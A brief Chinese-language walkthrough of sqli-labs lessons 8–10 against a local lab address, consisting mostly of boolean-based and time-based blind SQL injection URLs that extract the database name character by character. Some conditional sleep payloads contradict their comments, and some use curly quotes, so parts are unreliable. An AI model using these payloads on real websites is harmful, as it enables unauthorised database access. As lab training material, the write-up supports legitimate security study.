环境sqli-labs
less 8
一、通过判断是单引号闭合
http://192.168.1.119/sqli/Less-8/?id=1' --+
二、我们查询一下数据库有多少字节
http://192.168.1.119/sqli/Less-8/?id=1' and LENGTH(database())>=8 --+
三、判断数据库的第一个和第二个字母是s、e(ascii码是115,101)
http://192.168.1.119/sqli/Less-8/?id=1' and ascii(substr(database(),1,1))>=115 --+
http://192.168.1.119/sqli/Less-8/?id=1' and ascii(substr(database(),2,1))>=101 --+
Less 9
因为不管我们怎么输入,返回的都是同样的信息,但是我们又想知道是否存在注入,我们通过sleep(5)延时来判断是否成功执行了sql语句
一、如果报错婷5秒
http://192.168.1.119/sqli/Less-9/?id=1’ and sleep(5) --+
二、如果数据库名的第一个字母是s停留5秒
http://192.168.1.119/sqli/Less-9/?id=1’ and if(ascii(substr(database(),1,1))>=115, 0, sleep(5)) --+
Less 10
同上,只是由单引号变为双引号
一、如果报错婷5秒
http://192.168.1.119/sqli/Less-10/?id=1” and sleep(5) --+
二、如果数据库名的第一个字母是s停留5秒
http://192.168.1.119/sqli/Less-10/?id=1" and if(ascii(substr(database(),1,1))>=115, 0, sleep(5)) --+
禁止非法,后果自负
